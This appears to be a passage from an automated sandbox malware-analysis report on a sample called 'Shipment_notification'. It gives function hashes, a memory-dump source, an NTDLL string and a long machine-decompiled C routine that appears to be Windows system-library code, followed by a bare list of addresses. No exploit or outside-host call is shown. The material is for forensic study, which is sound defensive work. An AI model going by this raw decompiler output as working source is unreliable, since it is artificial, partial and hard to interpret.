                                                                                • Instruction Fuzzy Hash: 781187B5D00748EBDF28CFB9850579CBBB0FB05311F2042AEE529AB292C3300612CF14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B7FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 01B7FF60
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                • API String ID: 0-1911121157
                                                                                • Opcode ID: 8af52df88c02015b42798fbb3ab42b865ad4d665d339bac69228e1e7784672b3
                                                                                • Instruction ID: a41d7be63ee883291e12f455cc92425b2c13e4013414294dd4f266fb7f3af988
                                                                                • Opcode Fuzzy Hash: 8af52df88c02015b42798fbb3ab42b865ad4d665d339bac69228e1e7784672b3
                                                                                • Instruction Fuzzy Hash: 3C110471911544EFDF2EEB54C988FA8BBB1FF08714F5480D8E1145B161CB389950CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01BB5BA5 Relevance: .6, Instructions: 592COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 88%
                                                                                			E01BB5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1bc1178);
				E01B3D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01BB4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E01B2D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01BB5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x1bd60e8;
								if( *0x1bd60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x1bd60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01B29710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01B26DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E01B2F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E01B2F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E01B2F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E01B2FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E01B2FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E01B2F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E01B2F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01BB4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E01B3D130(_t427, _t494, _t511);
				}
			}










































































                                                                                0x01bb5ba5
                                                                                0x01bb5baa
                                                                                0x01bb5baf
                                                                                0x01bb5bb4
                                                                                0x01bb5bb6
                                                                                0x01bb5bbc
                                                                                0x01bb5bbe
                                                                                0x01bb5bc4
                                                                                0x01bb5bcd
                                                                                0x01bb5bd3
                                                                                0x01bb5bd6
                                                                                0x01bb5bdc
                                                                                0x01bb5be0
                                                                                0x01bb5be3
                                                                                0x01bb5beb
                                                                                0x01bb5bf2
                                                                                0x01bb5bf8
                                                                                0x01bb5bfe
                                                                                0x01bb5c04
                                                                                0x01bb5c0e
                                                                                0x01bb5c18
                                                                                0x01bb5c1f
                                                                                0x01bb5c25
                                                                                0x01bb5c2a
                                                                                0x01bb5c2c
                                                                                0x01bb5c32
                                                                                0x01bb5c3a
                                                                                0x01bb5c3f
                                                                                0x01bb5c42
                                                                                0x01bb5c48
                                                                                0x01bb5c5b
                                                                                0x01bb5c5b
                                                                                0x01bb5c2c
                                                                                0x01bb5cb7
                                                                                0x01bb5cb9
                                                                                0x01bb5cbf
                                                                                0x01bb5cc2
                                                                                0x01bb5cca
                                                                                0x01bb5ccb
                                                                                0x01bb5ccb
                                                                                0x01bb5cd1
                                                                                0x01bb5cd7
                                                                                0x01bb5cda
                                                                                0x01bb5ce1
                                                                                0x01bb5ce4
                                                                                0x01bb5ce7
                                                                                0x01bb5ced
                                                                                0x01bb5cf3
                                                                                0x01bb5cf9
                                                                                0x01bb5cff
                                                                                0x01bb5d08
                                                                                0x01bb5d0a
                                                                                0x01bb5d0e
                                                                                0x01bb5d10
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01bb5d16
                                                                                0x01bb5d1a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01bb5d20
                                                                                0x01bb5d22
                                                                                0x01bb5d25
                                                                                0x01bb5d2f
                                                                                0x01bb5d2f
                                                                                0x01bb5d33
                                                                                0x01bb5d3d
                                                                                0x01bb5d49
                                                                                0x01bb5d4b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01bb5d5a
                                                                                0x01bb5d5d
                                                                                0x01bb5d60
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01bb5d66
                                                                                0x01bb5d69
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01bb5d6f
                                                                                0x01bb5d6f
                                                                                0x01bb5d73
                                                                                0x01bb5d79
                                                                                0x01bb5d7f
                                                                                0x01bb5d86
                                                                                0x01bb5d95
                                                                                0x01bb5d98
                                                                                0x01bb5dba
                                                                                0x01bb5dcb
                                                                                0x01bb5dce
                                                                                0x01bb5dd3
                                                                                0x01bb5dd6
                                                                                0x01bb5dd8
                                                                                0x01bb5de6
                                                                                0x01bb5dec
                                                                                0x01bb5dee
                                                                                0x01bb5df1
                                                                                0x01bb5df3
                                                                                0x01bb635a
                                                                                0x01bb635a
                                                                                0x00000000
                                                                                0x01bb635a
                                                                                0x01bb5dfe
                                                                                0x01bb5e02
                                                                                0x01bb5e05
                                                                                0x01bb5e07
                                                                                0x01bb5e10
                                                                                0x01bb5e13
                                                                                0x01bb5e1b
                                                                                0x01bb5e1c
                                                                                0x01bb5e21
                                                                                0x01bb5e22
                                                                                0x01bb5e23
                                                                                0x01bb5e25
                                                                                0x01bb5e2a
                                                                                0x01bb5e2c
                                                                                0x01bb5e2e
                                                                                0x01bb5e36
                                                                                0x01bb5e39
                                                                                0x01bb5e42
                                                                                0x01bb5e47
                                                                                0x01bb5e4d
                                                                                0x01bb5e54
                                                                                0x01bb5e54
                                                                                0x01bb5e54
                                                                                0x01bb5e2e
                                                                                0x01bb5e5c
                                                                                0x01bb5e5f
                                                                                0x01bb5e62
                                                                                0x01bb5e64
                                                                                0x01bb5e6b
                                                                                0x01bb5e70
                                                                                0x01bb5e7a
                                                                                0x01bb5e7a
                                                                                0x01bb5e7a
                                                                                0x01bb5e6b
                                                                                0x01bb5e7e
                                                                                0x01bb5e7f
                                                                                0x01bb5e7f
                                                                                0x01bb5e81
                                                                                0x01bb5e87
                                                                                0x01bb5e8b
                                                                                0x01bb5e8c
                                                                                0x01bb5e8c
                                                                                0x01bb5e8c
                                                                                0x01bb5e9a
                                                                                0x01bb5e9c
                                                                                0x01bb5ea2
                                                                                0x01bb5ea6
                                                                                0x01bb5f50
                                                                                0x01bb5f50
                                                                                0x01bb5f57
                                                                                0x01bb5f66
                                                                                0x01bb5f66
                                                                                0x01bb5f66
                                                                                0x01bb5f68
                                                                                0x01bb5f6a
                                                                                0x01bb63d0
                                                                                0x00000000
                                                                                0x01bb5f70
                                                                                0x01bb5f70
                                                                                0x01bb5f91
                                                                                0x01bb5f9c
                                                                                0x01bb5f9e
                                                                                0x01bb5fa4
                                                                                0x01bb5fa6
                                                                                0x01bb638c
                                                                                0x01bb6392
                                                                                0x01bb63a1
                                                                                0x01bb63a7
                                                                                0x01bb63af
                                                                                0x01bb63af
                                                                                0x01bb63bd
                                                                                0x01bb63d8
                                                                                0x00000000
                                                                                0x01bb63d8
                                                                                0x01bb5fac
                                                                                0x01bb5fb2
                                                                                0x01bb5fb4
                                                                                0x01bb5fbd
                                                                                0x01bb5fc6
                                                                                0x01bb5fce
                                                                                0x01bb5fd4
                                                                                0x01bb5fdc
                                                                                0x01bb5fec
                                                                                0x01bb5fed
                                                                                0x01bb5fee
                                                                                0x01bb5fef
                                                                                0x01bb5ff9
                                                                                0x01bb5ffa
                                                                                0x01bb5ffb
                                                                                0x01bb5ffc
                                                                                0x01bb6000
                                                                                0x01bb6004
                                                                                0x01bb6012
                                                                                0x01bb6012
                                                                                0x01bb6018
                                                                                0x01bb6019
                                                                                0x01bb601a
                                                                                0x01bb601b
                                                                                0x01bb601c
                                                                                0x01bb6020
                                                                                0x01bb6059
                                                                                0x01bb605c
                                                                                0x01bb6061
                                                                                0x01bb6061
                                                                                0x01bb6022
                                                                                0x01bb6022
                                                                                0x01bb6022
                                                                                0x01bb6025
                                                                                0x01bb602a
                                                                                0x01bb602b
                                                                                0x01bb6031
                                                                                0x01bb6037
                                                                                0x01bb6038
                                                                                0x01bb603e
                                                                                0x01bb6048
                                                                                0x01bb6049
                                                                                0x01bb604a
                                                                                0x01bb604b
                                                                                0x01bb604c
                                                                                0x01bb604d
                                                                                0x01bb6053
                                                                                0x01bb6054
                                                                                0x01bb6054
                                                                                0x01bb6062
                                                                                0x01bb6065
                                                                                0x01bb6067
                                                                                0x01bb606a
                                                                                0x01bb6070
                                                                                0x01bb6075
                                                                                0x01bb6076
                                                                                0x01bb6081
                                                                                0x01bb6087
                                                                                0x01bb6095
                                                                                0x01bb6099
                                                                                0x01bb609e
                                                                                0x01bb60a4
                                                                                0x01bb60ae
                                                                                0x01bb60b0
                                                                                0x01bb60b3
                                                                                0x01bb60b6
                                                                                0x01bb60b8
                                                                                0x01bb60ba
                                                                                0x01bb60ba
                                                                                0x01bb60ba
                                                                                0x01bb60ba
                                                                                0x01bb60be
                                                                                0x01bb60c0
                                                                                0x01bb60c5
                                                                                0x01bb60c5
                                                                                0x01bb60c5
                                                                                0x01bb60c6
                                                                                0x01bb60cd
                                                                                0x01bb6114
                                                                                0x01bb60cf
                                                                                0x01bb60cf
                                                                                0x01bb60d4
                                                                                0x01bb60d5
                                                                                0x01bb60da
                                                                                0x01bb60db
                                                                                0x01bb60e1
                                                                                0x01bb60e2
                                                                                0x01bb60e8
                                                                                0x01bb60f8
                                                                                0x01bb60fd
                                                                                0x01bb60fe
                                                                                0x01bb6102
                                                                                0x01bb6104
                                                                                0x01bb6107
                                                                                0x01bb6109
                                                                                0x01bb610b
                                                                                0x01bb610b
                                                                                0x01bb610b
                                                                                0x01bb610b
                                                                                0x01bb610f
                                                                                0x01bb610f
                                                                                0x01bb6117
                                                                                0x01bb611a
                                                                                0x01bb611f
                                                                                0x01bb6125
                                                                                0x01bb6134
                                                                                0x01bb6139
                                                                                0x01bb613f
                                                                                0x01bb6146
                                                                                0x01bb6148
                                                                                0x01bb614b
                                                                                0x01bb614d
                                                                                0x01bb614f
                                                                                0x01bb614f
                                                                                0x01bb614f
                                                                                0x01bb614f
                                                                                0x01bb6153
                                                                                0x01bb6159
                                                                                0x01bb6159
                                                                                0x01bb615c
                                                                                0x01bb6163
                                                                                0x01bb6169
                                                                                0x01bb616c
                                                                                0x01bb6172
                                                                                0x01bb6181
                                                                                0x01bb6186
                                                                                0x01bb6187
                                                                                0x01bb618b
                                                                                0x01bb6191
                                                                                0x01bb6195
                                                                                0x01bb61a3
                                                                                0x01bb61bb
                                                                                0x01bb61c0
                                                                                0x01bb61c3
                                                                                0x01bb61cc
